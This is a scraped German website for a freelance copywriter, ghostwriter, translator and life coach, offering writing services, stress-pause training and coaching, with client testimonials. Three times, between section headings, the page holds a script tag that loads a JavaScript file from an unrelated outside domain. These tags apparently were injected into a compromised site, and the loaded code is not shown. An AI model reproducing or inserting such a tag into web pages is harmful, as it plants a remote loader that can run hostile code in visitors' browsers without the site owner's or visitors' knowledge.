WORDS & SOUL TEXTE

WORTE MIT SEELE

<script src='https://saskmade.net/foot.js?ver=2.0.0' type='text/javascript'></script>

TEXTEN

Du möchtest der Welt etwas mitteilen? Du hast aber keine Zeit oder keinen Spass am Schreiben?
Nun - ich schreibe leidenschaftlich gerne! Meine Worte bringen deine Botschaft auf den Punkt. Dabei respektieren und berücksichtigen sie immer deine Persönlichkeit. Meine Worte verleihen deinen Texten eine Seele. Deine Seele.
Wenn du weißt, was du sagen möchtest aber dennoch irgendetwas fehlt, dann optimiere ich deinen Text gerne. Durch meine Worte wird deine Mitteilung die Menschen und ihre Herzen berühren. Gerne erstelle ich dir unverbindlich ein individuelles Angebot.

GHOSTWRITING

Du hast viel zu erzählen und könntest ein ganzes Buch mit deinen Ideen füllen - aber dir fehlt die Zeit oder die Lust zum Schreiben? Da Schreiben zu meinen Leidenschaften gehört, stehen die Chancen für die Lösung dieser Herausforderung gut. Lass uns doch über deine Idee sprechen.

ÜBERSETZEN

Do you speak English? - ¿Habla Español?
words & soul funktioniert auch in anderen Sprachen. Gerne verhelfe ich deinen Texten auch in Englisch und Spanisch zu mehr Seele. Oder helfe dir, englische und spanische Texte in ein wunderbares Deutsch zu übersetzen.

WORDS & SOUL TRAINING

ERFAHRUNG WEITERGEBEN

<script src='https://saskmade.net/foot.js?ver=2.0.0' type='text/javascript'></script>

MEHR ERFOLG DURCH PAUSEN

Du hast zu viele Bälle in der Luft und keine Zeit mehr für dich? Du rennst nur noch allem hinterher und fühlst dich müde erschöpft, überfordert oder gestresst? Das kenne ich gut. Aber das muss nicht so sein. Ich zeige dir, wie du ganz einfach kurze Erholungs-Pausen in deinen Alltag einbauen kannst. Wenn du regelmässig echte Pausen machst, merkst du, dass das Leben kein Kampf sein muss. Du erreichst deine Ziele wieder und hast Erfolg – ganz ohne Erschöpfung und Stress. 

LIFE SKILL COACHING

Du hängst gerade in einer schwierigen Situation fest? Du weißt nicht weiter und findest keinen Ausweg? Coaching ist Hilfe zur Selbsthilfe.
Deine Probleme kann ich nicht für dich lösen. Aber ich kann dich dabei unterstützen, sinnvolle Lösungen zu finden, die zu dir passen.
Mit Hilfe meiner praktischen und individuell auf dich abgestimmten Tools, bei denen Sinnfindung und Identifikation mit deinen eigenen Werten eine wichtige Rolle spielen, wirst du den Weg durch deine Krise finden.

WAS UNS STARK MACHT

Jeder Mensch hat seine ganz eigenen Motivatoren und Stressoren oder Stolpersteine und deine werden wir gemeinsam herausfinden. Wir identifizieren deine persönlichen Ziele und deine Ressourcen, die dir zur Verfügung stehen. Gemeinsam definieren wir, wie du sie nutzen kannst, damit du in der Lage bist, zukünftigen Herausforderungen ruhig entgegen zu sehen und sie erfolgreich zu meistern.

WORDS & SOUL IMPULSE

LEBEN UM DAVON ZU ERZÄHLEN

<script src='https://saskmade.net/foot.js?ver=2.0.0' type='text/javascript'></script>

GESCHICHTEN, DIE DAS LEBEN SCHREIBT

Gabriel Gracía Márquez hat recht, wenn er sagt: "Vivir para contarla" - man lebt, um davon zu erzählen.
Ich habe viel zu erzählen und als Expertin meines Lebens gebe ich meine Erfahrungen & Erkenntnisse gerne weiter. Meine Impulse und Geschichten drehen sich u.a. um folgende Themen:

Mach mal Pause - Der richtige Umgang mit Stress
Letting go - Loslassen - aber woher den Mut nehmen?
Powerfrau unplugged - Kinder, Küche, Karriere - wo bleibe ich?
Crisis what crisis? - Die persönliche Krise als Chance

DAS SAGEN MEINE KUNDEN

"So ein schöner Text mit einem gelungenen Abschluss!
Vielen, vielen, vielen Dank!"

 M. H. aus D

"Liebe Heike, ich danke Dir von Herzen für die tolle Arbeit."

A. R. aus CH

"Vielen Dank für deine Hilfe!
Ich bin glücklich mit dem Ergebnis!"

 B. K. aus A
"Liebe Heike - In 5 Buchstaben: S U P E R"
 
 K. V. aus CH

"Herzlichen Dank für die tolle Arbeit!"

 S. F. aus FL

"Du hast eine ungeheuer positive und beruhigende Ausstrahlung.
Danke für die lieben Worte."

N. R. aus FL

"Kompliment! Sie können nicht nur schreiben, Sie haben auch ein gutes Auge. Ich habe die Kunst (...) lernen müssen, Schrift und Bild als Ganzes zu sehen, nur dann kann man seine Botschaft stimmig rüberbringen."

S. R. aus D

"Ich fand die Zusammenarbeit mit dir sehr bereichernd und freue mich darauf, dich wieder zu kontaktieren, wenn wir gute Texte benötigen."

M. E. aus FL

MÖCHTEST DU MIT MIR ARBEITEN?